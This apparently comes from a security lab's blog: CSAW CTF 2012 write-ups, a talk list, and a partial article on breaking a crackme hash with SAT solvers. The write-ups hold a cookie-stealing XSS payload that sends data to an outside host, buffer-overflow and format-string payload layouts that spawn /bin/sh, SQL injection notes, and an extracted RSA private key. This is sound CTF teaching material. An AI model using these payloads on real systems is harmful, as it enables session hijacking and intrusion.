Now that we know this algorithm uses XOR as its main operation, we can use a very interesting property of this binary operator:
$$Plain \oplus Key = Cipher \Leftrightarrow Plain \oplus Cipher = Key$$If we send a block using a plaintext
P1
and it gives usC1
, we can use that property to deduce what we should send to haveC2
be what we want:$$P2 = C2 \oplus Key \Rightarrow P2 = C2 \oplus (P1 \oplus C1)$$It turns out we can’t use that for a whole message because the key seems to depend on the previous blocks plaintexts. We had to construct the message block per block using that technic. When encrypted, our message is:
<script>new Image().src="http://delroth.net/?c="+encodeURI(document.cookie);</script>
We sent that to the admin and got his session ID transmitted to our server. Using that we were able to login to his account and find some encrypted messages (and their associated key). The first message had a plaintext key when decrypted gave us another encryption key, which we used to decrypt a second message, giving us the final key we had to submit on the CTF website.
CSAW CTF 2012: timewave-zero.pcap (net400)
< mserrano> inb4 you have to rotate and flip the pcap and get a gzip out of it
For this exercise, we are provided a pcap file containing PMU reporting values using the Synchrophasor protocol, also known as IEEE C37.118. The first thing is to google that, and see what we get. The most interesting result is Wireshark wiki. Indeed we can find example files on this page. If you download the fourth example (“
C37.118_4in1PMU_TCP.pcap
”) and binary diff it with timewave-zero.pcap you see the only changing data are the timestamps of the Synchrophasor packets. We can therefore assume that we have to work on those values.There are 1353 timestamps, but if we look closer, we can see that all the timestamps are between 2012-12-21 00:00:00 GMT and 2012-12-22 23:59:59 GMT except for the last one which is 1970-01-01 00:00:00 GMT a.k.a 0. Ignoring it gives us 1352 timestamps, and 1352 just happens to be a multiple of 8 (1352 = 8 * 13 * 13). That looks good for hiding 1 bit of data in each timestamp.
So now, 1-bit per timestamp. You start the guessing game with the the classical LSB. No dice… LSB after reordering the packet according to their timestamps? No dice… 0bit and 1bit encoded accordingly to the packet being late or early in a virtual packet reordering (hey, who knows…). Guess what? No dice.
Hell we even tried animating the synchrophaser before and after packet reordering to see if something would “draw” during the animation. No dice… Time to stop the guessing game and use a weapon of mass statistical destruction: the histogram! Let’s see if we find some statistical data bias.
We can notice two things:
- More values on the left, which represents smaller timestamps
- A gap in the middle of the histogram
With these observation we can infer how the information are hidden in the timestamps: assuming the output should be readable ascii characters, we can assume the probability of 0-bit to be higher than of 1-bit. Looking again at the histogram, thresholding midpoint of the timestamp range would just give us exactly that. Furthermore, the gap in the middle is quite convenient insofar as it is probably preventing from ambiguities at the threshold value (should we threshold using > or >= ? )
With all this we can write a script which takes all the timestamps and get the key:
#!/usr/bin/env python # -*- coding: UTF-8 -*- import sys import struct with open(sys.argv[1]) as f: timestamps = [int(line) for line in f] min_ts = min(timestamps) max_ts = max(timestamps) print "len = %d, min = 0x%x, max = 0x%x" % (len(timestamps), min_ts, max_ts) out = open(sys.argv[2], "w") val = 0 bitcnt = 0 for ts in timestamps: if (ts - min_ts) >= (max_ts - ts): val = (val << 1) | 1 else: val <<= 1 bitcnt += 1 if bitcnt == 8: out.write(struct.pack("B", val)) bitcnt = 0 val = 0 out.close()
Let’s run it:
key{411a8451f24b40647d518ccc456a9e6502f59a8992118d8bf08a65eb16feddba33561d0b383af978402631fba670b366f118505ee3c9ac3e37c9ad33b0d5db469585dd2cf5192fba9e1a99c5d336c3459089}
BUT as if steganography is not already annoyingly game-guessing enough, just submitting the key and call it a day would have been too easy, wouldn’t it? ;) We were unable to validate the key, which was refused by the web interface.
Clever ending: What if an undergradudate intern used VARCHAR(128) to store the key in the database validating the challenge? So we only pasted the 128 first chars.
Real ending: There was something else which was different from the Wireshark wiki reference file. One byte in the
snaplen
field of the global pcap header was changed from 0xFF to 0x7F. So we thought we had to take only the0x7F
first characters (nonsense, right?). As you are well aware,0x7F
equals 127. It sometimes helps to mistakenly copy 128 chars instead of 127 when copy/pasting!That’s all folks! Is timewave-zero.pcap the new BMP? Maybe not, but close enough we’d say. What do you think?
CSAW CTF 2012: Reverse Engineering 500 writeup
This reverse engineering challenge presented us with two binary files:
8086100f.mrom
and8086100f.mrom.tmp
. Looking through the strings we quickly noticed the MROM file is a PXE ROM for an Intel e1000e network card, based on iPXE (an open source PXE ROM with a lot of useful features). Very nice coincidence for us: a member of our team (Marin Hannache) was a GSoC student working on iPXE during this last summer, which helped us a lot in understanding what this challenge was about.iPXE allows the user to embed a script that is automatically run at boot time, in order to download file, send a query to a web server, get an IP from a DHCP server, or a lot of other possible actions. Looking a bit more in the strings of the MROM file we saw something that is likely to be a boot script for iPXE:
#!ipxe :retry dhcp || goto retry prompt --key 0x03 --timeout 5000 (Quick, Quick!) Press CTRL+C for GDB UDP stub && gdbstub udp net0 || kernel https://secure-doomsday-client-loader.c0.cx/boot/vmlinuz initrd https://secure-doomsday-client-loader.c0.cx/boot/initrd.gz?include_flag=0 boot
If the user do not press Ctrl+C to interrupt the boot sequence, iPXE will download a kernel and an initrd from an HTTPS server and boot using these files. The initrd seems very interesting with its
include_flag
query argument, so we tried to download it locally, settinginclude_flag=1
:$ wget --no-check-certificate "https://secure-doomsday-client-loader.c0.cx/boot/initrd.gz?include_flag=1" --2012-09-30 16:43:56-- https://secure-doomsday-client-loader.c0.cx/boot/initrd.gz?include_flag=1 Resolving secure-doomsday-client-loader.c0.cx... 128.238.66.211 Connecting to secure-doomsday-client-loader.c0.cx|128.238.66.211|:443... connected. WARNING: cannot verify secure-doomsday-client-loader.c0.cx's certificate, issued by ‘/C=YO/ST=LO/L=None/O=None/OU=None’: Self-signed certificate encountered. HTTP request sent, awaiting response... 400 Bad Request 2012-09-30 16:43:57 ERROR 400: Bad Request.
At first we thought the challenge was down, so we waited a bit, but the request was always failing. We then realized that some of the other strings in that file mentioned an
OpenSSL Generated Certificate
. The server was probably waiting for a query performed with a valid SSL client certificate/key pair, which was most likely embedded in the iPXE rom. After generating certificates and keys with OpenSSL and trying to match what was in the ROM with the DER format certificates we generated, we were able to extract a certificate and an RSA key from it:$ openssl x509 -in chall.crt -inform DER -----BEGIN CERTIFICATE----- MIIDhzCCAm+gAwIBAgICEAAwDQYJKoZIhvcNAQEFBQAwRzELMAkGA1UEBhMCWU8x CzAJBgNVBAgMAkxPMQ0wCwYDVQQHDAROb25lMQ0wCwYDVQQKDAROb25lMQ0wCwYD VQQLDAROb25lMB4XDTEyMDkwNTIyMzU1OVoXDTEyMTIwNDIyMzU1OVowSTELMAkG A1UEBhMCWU8xCzAJBgNVBAgMAkxPMQ0wCwYDVQQKDAROb25lMQ0wCwYDVQQLDARO b25lMQ8wDQYDVQQDDAZjbGllbnQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK AoIBAQDTp0cg6VHOUL0VIzcGic14TrZ0SsIvuwhkGX1d/qmmg+LL5nP0O0gRK+TF o42go5bCpCicnX3t13U5Pt8bCVyQTYaGaWiYf2v3z4/D3jd0ar6ENW2lwD5u9o/S cNfap24f2SJfDY70JR7bnd6CRimDIAj2Kjw2lEklQj2aGknX/cv3R1jL1C1PFehD 0zdi1TcXZU21acAVGkQpaSHKg4ufRk0xEE41RsieOusICHJcS4uM4bnZ2ThJhmR0 wj7/ld3iEOn5hD6dN9GY4vkqspIObOTgF50qhNVthN9HRzZUuyRxVCo95n+QvsjM BpfK8SXQiWCVL8XHLxdRn8Fc8o0XAgMBAAGjezB5MAkGA1UdEwQCMAAwLAYJYIZI AYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW BBQ8byvWA23f0DM/awb8AXB5sTqD9jAfBgNVHSMEGDAWgBSLfrxvYsZ1DUoH78PW dswZHqu6czANBgkqhkiG9w0BAQUFAAOCAQEAN3/0hNnCFZ7IgbiZjjzEPv/qBU5B teP7cm9M1Zr3MAF6L0+f6FDEjYCrKLEyiz4KKe9p0aUXiwvFiv8olQFhrybVDXjD dCgex8wC3aIzGurnpKCrINUM3ZYY9ukd2JX1dZGsbK/dKiPQZRsBpnWnMI2ZBx9W 1z2TUtAGAEpB5hDdud9mlQBdgSMh7mxCnTQtIUkKZp7JEeyuRwoifdWCGldyn0kW Yn3JMaY0iWE/T50+vqTxrhbB26u4IGzMW7FhHG8BDRpbnycpnQWLPDi1RyLVruyj Q6/xX6JfJZBcPpQ1N885BguEwS9XVW0jcvTHNSaYK31u6XA6BRTvm+yNMA== -----END CERTIFICATE----- $ openssl rsa -in chall.key -inform DER writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEA06dHIOlRzlC9FSM3BonNeE62dErCL7sIZBl9Xf6ppoPiy+Zz 9DtIESvkxaONoKOWwqQonJ197dd1OT7fGwlckE2GhmlomH9r98+Pw943dGq+hDVt pcA+bvaP0nDX2qduH9kiXw2O9CUe253egkYpgyAI9io8NpRJJUI9mhpJ1/3L90dY y9QtTxXoQ9M3YtU3F2VNtWnAFRpEKWkhyoOLn0ZNMRBONUbInjrrCAhyXEuLjOG5 2dk4SYZkdMI+/5Xd4hDp+YQ+nTfRmOL5KrKSDmzk4BedKoTVbYTfR0c2VLskcVQq PeZ/kL7IzAaXyvEl0IlglS/Fxy8XUZ/BXPKNFwIDAQABAoIBAFMQOyH3b1uA5DP/ dgDi4/hrK7/H9x20UT63ojPZVcs7xy4uayNWgJn8l/PYlCSPDwOkWSvdwyYsgJzO x9BchC89vaXSiHIQz9aZZtp/w1O08MACF94M7HOv4BG+p3fwbY+iL5MORyQZzVpz QnfuASyszdeOC8N/vpUYwgRQfNp+0TTJoGyJOwkVYn6EqSBmIh99UVaKTAPNXpCS RpcACnWQC9LR8asagd3orLQ5KoKjidy7oY5CJxq2hif9X2satxkftqsNxmtlOG6D 4xM7sYgXYH1DQibpNiCRZrAqJ1sDx6DEnOmrQf0U2UBpTKlSNCZYqzX7h9th0AFO dZwFwwECgYEA9NeE1pwBkvXToG76woCzm0nkTX4XzqVjwLFV1c+B/pYg0cwaCcrn PzQCm9IUAt1wvfKRiBiYZZF3FOhkzeQH7QqAsWLalNal0w9xaklI2LzezwbmWNEJ zNjnl2JCnI03xUjk/irWl0B07NqfHbPA8MzLtaEdld15k+87ZzsTTvECgYEA3UyP vAOdBLT8GAQ7W0XU0sTUhWSr0Pezn5kIURBcEm8z9dTwfUxkWDOSGjXRGAcJLkRX YLdDUVtReM9LxUSzQ4k488NyySMPcqzVohROhhS2DVyecOs+Yy2VAc62z2V2IJsN +JKzvjANHttSfA4fRZJN75rmz+TVztbmtjxarIcCgYBEkb8gI1zFfZchDTOpGUYz rUQE99VPCD6hjoiNcqnjVMQoPVLlfy+4IabBYNo92yph5/cd+FVlzJFfB56DkuMt XY2hICA7IsoaC+8lZxTBrlNwA2yrXw+xkOV7HgettFb0J3AKRpEGlwSn+KorNVZJ mfFLEq4odHhCF/O4+3By4QKBgQDRmUop0WJOqvx54sg1UpaYakS/cvIpIfLHHrJ5 1PzfmOOl2uFMS6Zew7mFiaNZFpDjeWco+2qPC+bGfdBOLxt6w+VlO6DkUIi5HGna 8VDOPZ+QWEDYwnZ8iRewdpE/LeIMT8+Tt572a5yBtUkSpm2H/2JBpn0mOp8nIPOz dsaK0QKBgEnVXm4ASylC9GAq7hcuppeXF+IwoxdI1iCDzK9U+n3nAKn/kcIyWE7N i9kXk8O1jRqEARpXaMp/ydWXuwfsjBv6e/R9IR+elkazbbr/dIcpofHunYRtrPwx yasGBlKiMmE6UrRUu/xY+jxG8BQfNNP1gU4ggUhvhtTGoRloRF1E -----END RSA PRIVATE KEY-----
Using these two files we were able to download the initrd successfully and extract it to find the key in
/key.txt
.CSAW CTF 2012: for200-500/net100-200/re100-400/web100-300/web600 writeups
This article regroups writeups for several challenges which did not deserve a full article.
for200 (1)
When you decode the chunks of the PNG file individually only one has a CRC error. It contains text which is the key to submit.
for200 (2)
When you decode the chunks of the PNG file individually only one text chunk has no CRC error. It contains text which is the key to submit.
for500
strings
net100
Open with Wireshark, “Follow TCP Stream” and notice a password being sent to a telnet server. This is the key.
net200
Find the POST request to a
<form>
on the New York bar website. The text sent with that form contains the key.re100
Open the executable with IDA, notice a function that does
c XOR 0xFF
on every byte of a string, locate the string, apply the xor, get the key.re200
Open the executable with Reflector, notice a function that does a XOR once again, reverse the operation, get the key.
re300
A bit more complicated this time: the decryption function needs a key, and the only thing we know is that the MD5 of the key is
ff97a9fdede09eaf6e1c8ec9f6a61dd5
. A Google Search tells us that this isMD5(Intel)
. This is still not the final key: the program uses that to decrypt a buffer using AES. Doing the same gives us the key to submit.re400
Open the binary with IDA, notice a
decrypt
function that doesNOT c
, locate the string, apply the NOT, get the key.web100
The auth is done through a cookie. Modify it (set username to admin), done.
web200
The SQL query allows us to inject something mysqli_real_escape’d in a LIKE clause, including
%
and_
. We can use that to select multiple users and have one matching the$auth
condition (valid password, we register him) and one matching the$admin
condition (username == Administrator).web300
There is an SQL injection on the
horses.php
page. You can’t normally use theselect
orunion
keywords (blacklisted), but if there is an equal sign before the keyword in the request it somehow works. From there we listed the tables inINFORMATION_SCHEMA
, found asessions
table containing a session for the admin user, used it to get the key. This was not the way the author expected people to solve his exercise and this bug was fixed during CTF.web600
In PHP strcmp/strcasecmp with an array fails and returns 0. We can use that to bypass the check and get the key to be printed.
CSAW CTF 2012: exploitation 200/300/400/500 writeups
This article regroups writeups for all exploitation challenges which did not deserve a full article.
Exploitation 200
This challenge is a linux elf32 wich listen on port 54321.
Each time a new client connect, it sends a message of welcome, and wait for receiving 512 bytes of data, those data are compared to the string : “A” * 26 + “\n”, if it match the challenge will open the file “key” and send it to us.
The key is : “b3ee1f0fff06f0945d7bb018a8e85127”
Exploitation 300
This challenge is a linux elf32 which listen on port 4842. The binary will setup handler on differents signals, the most interesting one, is SIGSYS(0x1F), after a client connect and send a message of welcome, it will raise this signal, the handler will send an another message, and read 2048 bytes of data into a buffer of 326 bytes on the stack. It’s clearly a simple stack based buffer overflow. And a fun thing is :
> readelf -l ./bin | grep STACK GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
The stack is executable, so let’s search some fun gadgets like jmp esp :
> rasm2 "jmp esp" ffe4
This gadget can be found inside section .eh_frame_hdr (0x08048F47). So the payload is really simple and look like this :
"A" * 326 + Addr_return (JMP ESP) + Shellcode (dup2 + excve(/bin/sh))
They changed the binary before we wrote this writeup, so our exploit does not work anymore and we don’t remember the key.
Exploitation 400
This challenge is a linux elf32 wich listen on port 23456.
The vulnerability is inside function sdoomsday() (There is symbol inside the binary …), it receive 511 bytes into .bss section and use this buffer for sprintf without format for filling a buffer on the stack. It’s a simply format string vulnerability.
A nice thing is that .bss section is executable, so the payload will be :
| JMP AFTER FORMAT | FORMAT | NOP | SHELLCODE
What we will have to do is replacing address of a function inside got section called just after sprintf (for exemple send wich is called inside cd() function). An another fun trick is inside ssc function, it check if inside the buffer there is the pattern :
/bin/sh /usr/bin/es /usr/bin/ksh /bin/ksh /usr/bin/rc /usr/bin/esh /bin/dash /bin/bash /bin/rbash h//shh/bin
Just xor your shellcode and add a stub at the beginning for dexoring it.
The key is : “What_a_simple_filter_that_was”
Exploitation 500
This is the last exploitation challenge, it is as usual a linux elf32 wich listen on port 12345.
The first thing the program do is receiving 124 bytes, and check if in this buffer there is the pattern :
CPE1704TKS IMSAI 8080 microcomputer WORP Galaga Pencil Tic-Tac-Toe
And then receive 1024 bytes, but the return value of recv() will be the size of a memcpy() into a buffer too small, so it is a simply stack based buffer overflows. We can overwrite easily the return address by the adress of receive and forge the stack like :
+0xBC : New Return Address : 0x08048760 # .plt recv() +0xC0 : Return Address recv : 0x0804B000 # .bss section +0xC4 : File Descriptor : 0x4 # socket client +0xC8 : Buffer : 0x0804B000 # .bss section +0xCC : Size : 0x54 # Size Shellcode +0xD0 Flags : 0x0 # who care ?
We send the same shellcode as usual dup2 + execve(/bin/sh), and enjoy our shell.
The key is “Something_different_from_strcpy”
CSAW CTF 2012: dongle.pcap (net300)
We received a pcap file containing USB Request Blocks (URBs) with no other information. A quick look at the exchanged frames with Wireshark revealed that most of the data was sent to the host from a specific device (26.3, HID device from “bInterfaceClass”, keyboard from “bInterfaceProtocol” from the official documentation) on an interrupt endpoint.
The first idea was of course: is the key typed on the keyboard? Every interrupt packet from the 26.3 device was carrying a keycode, and all these packets had the same URB id:
0xffff88003b7d8fc0
. Exploring packets structure made it easy to localize these keycodes: the offset0x42
of these interrupt packets. We just had to script keycodes extracting using a correspondance table, then!We created a Python script using the
dpkt
library to parse the pcap file and extract the keycodes:import binascii import dpkt import struct import sys # Start the pcap file parsing f = open(sys.argv[1], 'rb') pcap = dpkt.pcap.Reader(f) # Create a partial mapping from keycodes to ASCII chars keys = {} keys.update({ i + 0x4: chr(i + ord('a')) for i in range(26) }) keys.update({ i + 0x1e: chr(i + ord('1')) for i in range(9) }) keys[0x27] = '0' keys.update({ 0x28: '\n', 0x2c: ' ', 0x2d: '-', 0x2e: '+', 0x2f: '[', 0x30: ']', }) # Then iterate over each USB frame for ts, buf in pcap: # We are interested only in packets that has the expected URB id, and # packets carrying keycodes embed exactly 8 bytes. urb_id = ''.join(reversed(buf[:8])) if binascii.hexlify(urb_id) != 'ffff88003b7d8fc0': continue data_length, = struct.unpack('<I', buf[0x24:0x28]) if data_length != 8: continue key_code = ord(buf[0x42]) if not key_code: continue sys.stdout.write(keys[key_code])
The output of this script was the following “keyboard stream”:
rxterm -geometry 12x1+0+0 echo k rxterm -geometry 12x1+75+0 echo e rxterm -geometry 12x1+150+0 echo y rxterm -geometry 12x1+225+0 echo [ rxterm -geometry 12x1+300+0 echo c rxterm -geometry 12x1+375+0 echo 4 rxterm -geometry 12x1+450+0 echo 8 rxterm -geometry 12x1+525+0 echo b rxterm -geometry 12x1+600+0 echo a rxterm -geometry 12x1+675+0 echo 9 rxterm -geometry 12x1+0+40 echo 9 rxterm -geometry 12x1+75+40 echo 3 rxterm -geometry 12x1+150+40 echo d rxterm -geometry 12x1+225+40 echo 3 rxterm -geometry 12x1+300+40 echo 5 rxterm -geometry 12x1+450+40 echo c rxterm -geometry 12x1+375+40 echo 3 rxterm -geometry 12x1+525+40 echo a rxterm -geometry 12x1+600+40 echo ]
Alright, the indented result should be to display the key re-ordering first the characters with terminal positions. We then had just to format a script to actually open multiple terms in the same time at the right place and containing the associated character:
python2 extract_keyboard.py dongle.pcap | sed 's/rxterm \(.*\)/xterm \1 -e "\\/g' | sed 's/echo \(.*\)/echo -n \1; read" \&/g' > display_key.sh
And finally, running the
display_key.sh
script gave us the key:key[c48ba993d353ca]
LSE Week 2012 videos
It has been about three months since the 2012 edition of the LSE week, and we are happy because it was quite a success, having on average 57 people attending each talk.
Now is time to publish slides (in english) and videos (in french).
CSAT (Pierre-Marie de Rodat - 30mn)
The premise of an interactive disassembler aiming at being collaborative.
ARM architecture (Julien Frêche - 30mn)
Global overview and emulator writing.
Datameat (Victor Apercé - 1h)
Metadata oriented filesystem.
FrASM (Pierre-Marie de Rodat - 30mn)
An assembler writing framework.
Video game console emulation (Pierre Bourdon & Nicolas Hureau - 1h30)
Implications and problems of emulating high performance hardware and cycle-accurate emulation. slides
Possible optimizations for an interpreter (Benoît Zanotti - 30mn)
What can be done? How will it impact performance? Prolog as an example. slides
Routing protocol: BGP4 (Sylvain Laurent - 18h00 - 30mn)
Introduction to BGP4 and its role in networks. slides
WTF is ACPI? (Ivan Delalande - 1h)
Global overview and implementation of an ACPI VM. slides
Forensics (Samuel Chevet - 1h)
Interest and tools. slides
Tutorial: Arduino development (Augustin Chéron - 1h)
Use cases, limitations and demonstration of the Arduino platform. slides
Tutorial: Exploitation techniques (Clément Rouault - 1h)
Examples and mitigation of software exploits. slides
Introduction to CTFs (Nicolas Hureau - 1h)
Interest of participating in security contests and walkthrough of a few exercises. slides
WPA2 enterprise and Wi-Fi security (Pierre Bourdon - 1h)
What is to be avoided when deploying Wi-Fi on a student campus. slides
C!: Interface Implementation (Marwan Burelle - 30mn)
Evolution of rootkits (Samuel Chevet - 1h)
Inner working, analysis and development of the major rootkits. slides
Crackme LSE Week (Pierre Bourdon - 30mn)
Making-of and solution of the LSE Week crackme. slides
Using SAT and SMT to defeat simple hashing algorithms
Note: this article uses MathJax to display formulas written in TeX. Please enable Javascript in order to see the formulas correctly.
One week has passed since the end of LSE Week 2012 and I have received several partial solutions for the crackme that was released at the start of LSE Week for people to play with. Most people who bothered writing partial solutions were able to break the packing and anti debugging parts of it, but stopped at the very end when they faced a simple hashing algorithm they had to reverse to generate a valid key for the crackme. In pseudocode, the algorithm was the following:
a, b, c, d are the four 32 bits integers given as input (key) Compute a simple checksum in order to avoid having several good solutions to the problem: if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036) return 0; Kind of useless step just to make things a bit harder a = a XOR c b = b XOR d Then, 128 times in a row, for each integer: Shuffle the bits of the number (using a predefined table) XOR the number with a predefined constant Rotate left the number by N bits (N being another constant) Check if: a == 0x8e2c4c74 b == 0xa6c27e2a c == 0xf5e15d3d d == 0x7bebc2ba
Clever people might notice that all of the operations done by that “hashing” algorithm are actually non destructive and completely reversible. That means our hashing function is bijective (no collisions) and that it is very easy to get the input from the output: just run it in reverse (rotate left becomes rotate right, XOR stays the same, shuffle uses a slightly modified table). It was meant to keep the crackme easy to crack once the code has been recovered and understood. Unfortunately, some last minute bugs cropped up in the implementation of the algorithm (never try to fix bugs at 4AM without automated tests…) and made the algorithm completely different:
a, b, c, d are the four 32 bits integers given as input (key) Compute a simple checksum in order to avoid having several good solutions to the problem: if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036) return 0; a = a XOR c b = b XOR d Then, 128 times in a row, for each integer: Shuffle the bits of the number using a table that might map some bits two times, and some other bits zero times (DESTRUCTIVE) XOR the number with a predefined constant Rotate left the number by N bits (N being another constant), except if this is the last number - in this case, rotate the third integer and use it as the new value for the last integer Check if: a == 0x8e2c4c74 b == 0xa6c27e2a c == 0xf5e15d3d d == 0x7bebc2ba
The first error (in the shuffling part) comes from an indexing error in my bits position table. The table was defined like this:
// Maps the input bit position to the output bit position static const char mapping[128] = { // First integer 2, 14, 4, 24, 7, 31, 16, 18, 30, 17, 12, 27, 6, 26, 9, 22, 1, 28, 5, 3, 11, 23, 13, 25, 19, 20, 10, 29, 8, 15, 21, 0, // Second integer 26, 20, 15, 27, 28, 14, 21, 7, 17, 22, 31, 12, 4, 13, 8, 10, 23, 19, 18, 25, 9, 2, 5, 11, 6, 3, 24, 1, 0, 30, 29, 16, // Third integer 4, 26, 20, 13, 21, 29, 3, 14, 5, 22, 18, 6, 28, 23, 16, 10, 15, 27, 25, 1, 17, 0, 30, 2, 8, 24, 7, 9, 31, 19, 12, 11, // Fourth integer 8, 22, 26, 1, 20, 2, 30, 23, 6, 9, 0, 14, 18, 31, 3, 21, 4, 29, 24, 7, 12, 28, 16, 25, 11, 17, 19, 27, 5, 10, 15, 13 };
But the indexing was done like this:
// *pn points to the current integer, i is the index of this integer (0, 1, // 2 or 3), j is the current bit. newn |= ((*pn >> scramble[(i << 2) + j]) & 1) << j;
That
i << 2
should actually be ai << 5
in order to use the whole mapping table. This bug makes the algorithm destructive because some bits from the input will not be used to generate the output. That means you can’t get the input of the step from its output: the destroyed bits could have been 0 or 1.The second bug is actually a stupid typo:
a = ROTL(a, 7); b = ROTL(b, 13); c = ROTL(c, 17); d = ROTL(c, 25);
I don’t think this requires much explanation.
Now that the context of this article has been explained, the real question for me was the following: do these errors make the crackme unsolvable or can it still be solved easily using either bruteforce or more complex analysis techniques?
SAT and its applications to cryptography
I started writing a bruteforcer for this hash using backtracking for each destroyed bit and only exploring the branches that would be valid later on by predicting as much as possible. Unfortunately, while that worked for a small number of iterations of the hash, the original algorithm used 128 iterations and the number of possible combinations increased a lot too fast to use such a simple technique.
Two days later I got reminded by a friend of a talk presented by Mate Soos at Hackito Ergo Sum 2011 about SAT solvers and their application to cryptography for breaking weak ciphers and hashes. Mate is the author of CryptoMiniSat, a very fast implementation of SAT with a few tweaks that can be used to increase efficiency for crypto usages.
Before going into the details of how to use SAT to break ciphers, let’s talk a little bit about SAT solvers. SAT solvers are programs designed to solve the Boolean Satisfiability Problem, which can be expressed very simply like this: For this boolean formula, can I find values for the variables that make the formula true. This is an NP-complete problem (which means you can’t solve the general case of that problem in polynomial time, only exponential time or slower) and is actually kind of the canonical NP-complete problem: it is a very common technique to reduce a problem to show that it is equivalent to SAT in order to prove that it is an NP complete problem.
Most SAT solvers take their input in a format called DIMACS, which is an easy-to-parse representation of boolean formulas in CNF (Conjunctive Normal Form). A CNF formula is a special case of boolean formula which is always written like this:
$$(X_i \vee \neg X_j) \wedge (\neg X_k \vee X_l \vee \neg X_m \vee X_n) \wedge \ldots$$Basically, CNF is a logical product (aka. conjunction) of sums of variables or negated variables (\(\neg A\)). Every boolean formula can be converted into an equivalent CNF formula, either manually (distribute the \(\vee\) over products) or through an automated process (there are some conversion tables between simple boolean equations and their CNF equivalent).
SAT solvers have a lot of applications and tend to be very optimized in order to have extremely good performances in most cases. It is common to try to solve SAT problems with several hundreds of thousands of clauses (a clause is a single sum of variable, like \(A \vee B \vee \neg C \vee D\)) and tens of thousands of variables.
In his talk last year, Mate Soos told us about how HiTag2 (a cryptosystem used in car locks) was reverse engineered, then translated to mathematical formulas and finally converted to CNF formulas describing the relations between input bits and output bits. If you are interested by that talk, it is available on Youtube. I thought that this technique might be of some use in breaking my hash algorithm and started translating the hash algorithm to an equivalent CNF representation.
Breaking the hash with SAT
First of all, the definition of the algorithm would most likely use several thousands of clauses and about as much variables, so writing it by hand is out of the question. I started by writing a very simple library to generate DIMACS files, which exposes the following Python API:
CNFGenerator.new_var()
generates a new SAT variable instance, which has only one operation: logical negation (written-x
)CNFGenerator.add(v1, v2, ..., vN)
adds a clause to the output DIMACS fileCNFGenerator.output()
outputs the DIMACS representation
CryptoMiniSAT also provides a very useful extension to DIMACS for cryptographical uses: the ability to use XOR clauses which are \(A \oplus B \oplus C \oplus \ldots\). These prove very useful in order to write equivalences (\(A \Leftrightarrow B \equiv \neg (A \oplus B) \equiv \neg A \oplus B\)) or simply XOR relations.
CNFGenerator.add_xor
handles the generation of such clauses.Let’s start by defining our input variables. They are four vectors of 32 bits, so 128 boolean variables:
def cnf_int(gen, bits): return [gen.new_var() for i in range(bits)] # Input variables a = cnf_int(gen, 32) b = cnf_int(gen, 32) c = cnf_int(gen, 32) d = cnf_int(gen, 32)
If you follow the pseudocode above, the next step would normally be the checksum. This is actually the hardest part of this algorithm to formalize because of the arithmetic operations (additions and substractions of 32 bits numbers). We’ll do that last. The following step is
a ^= c; b ^= d
. This is quite easy to formalize. Let’s do it for the general case , i.e.a = b ^ c
. What this does is “make each bit ofa
equal to the same bit ofb
XOR the same bit ofc
”. To formalize it, we can introduce a new variable \(A\) which is equivalent to \(B \oplus C\), which means the clause can only be true iff \(A\) has the same value as \(B \oplus C\). We just need to write that in a form that CryptoMiniSat can understand:$$\begin{aligned} A \Leftrightarrow (B \oplus C) & \equiv \neg (A \oplus (B \oplus C)) \\\\ & \equiv \neg (A \oplus B \oplus C) \\\\ & \equiv \neg A \oplus B \oplus C \end{aligned}$$Applied to the 32 bits of the variables and converted to Python, this gives us the following code:
def cnf_xor(gen, a, b): out = [gen.new_var() for i in range(len(a))] for (a, b, o) in zip(a, b, out): gen.add_xor(-a, b, o) return out # a ^= c, b ^= d a = cnf_xor(gen, a, c) b = cnf_xor(gen, b, d)
Next comes the core of the hashing algorithm: the iterated loop shuffling the bits, XOR-ing with a constant and rotating the number. The interesting part here is that shuffling and rotating bits does not require any clause or additional variables for the SAT representation of the algorithm: For example, if you have a 4 bit integer represented as the vector \(A_3 A_2 A_1 A_0\), rotating it to the left by 2 bits transforms it to the vector \(A_1 A_0 A_3 A_2\). You just need to swap the elements in the list representing your variables. This gives us the following Python code:
def cnf_rotl(gen, n, b): """Performs a left rotation of n by b bits""" return n[-b:] + n[:-b] def cnf_hash(gen, a, b, c, d): """Hashes a, b, c, d, returns new a, new b, new c, new d""" out = [] for i, n in enumerate((a, b, c, d)): scrambled = [n[SCRAMBLE_TABLE[i][j]] for j in range(len(n))] xored = cnf_xor_const(gen, scrambled, XOR_TABLE[i]) out.append(xored) out[0] = cnf_rotl(gen, out[0], ROT_TABLE[0]) out[1] = cnf_rotl(gen, out[1], ROT_TABLE[1]) out[2] = cnf_rotl(gen, out[2], ROT_TABLE[2]) out[3] = cnf_rotl(gen, out[2], ROT_TABLE[3]) return out # Iterate the hash 128 times for a, b, c and d for i in range(128): a, b, c, d = cnf_hash(gen, a, b, c, d)
cnf_xor_const
works the same ascnf_xor
but “optimized” in order to XOR with a constant number instead of a variable number.Now that we computed the hashed values, we just need to put some clauses to make sure they are equal to the hash we are looking for. In the crackme, the hash value was
8e2c4c74a6c27e2af5e15d3d7bebc2ba
. To make sure one of our boolean vectors is equal to a constant value, we add one clause per bit of the vector which forces it to True if the corresponding bit in the constant value is 1, and False if the bit is 0:def cnf_equal(gen, n, c): for i in range(len(n)): b = c & 1 c >>= 1 if b: gen.add(n[i]) else: gen.add(-n[i]) # Check for equality cnf_equal(gen, a, 0x8e2c4c74) cnf_equal(gen, b, 0xa6c27e2a) cnf_equal(gen, c, 0xf5e15d3d) cnf_equal(gen, d, 0x7bebc2ba)
With only this code, the SAT solver will generate us values for a, b, c and d that compute to the hash we are looking for. However, we still have to defeat the checksum. Let’s look at its code again:
if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036) return 0;
We already now how to compute XORs, rotations and how to check for number equality, so the remaining part is additions and substractions on 32 bit numbers. As you may already know, substraction is actually very easy to implement in terms of addition and two’s complement, which is itself very easy to implement in terms of binary inversion and addition:
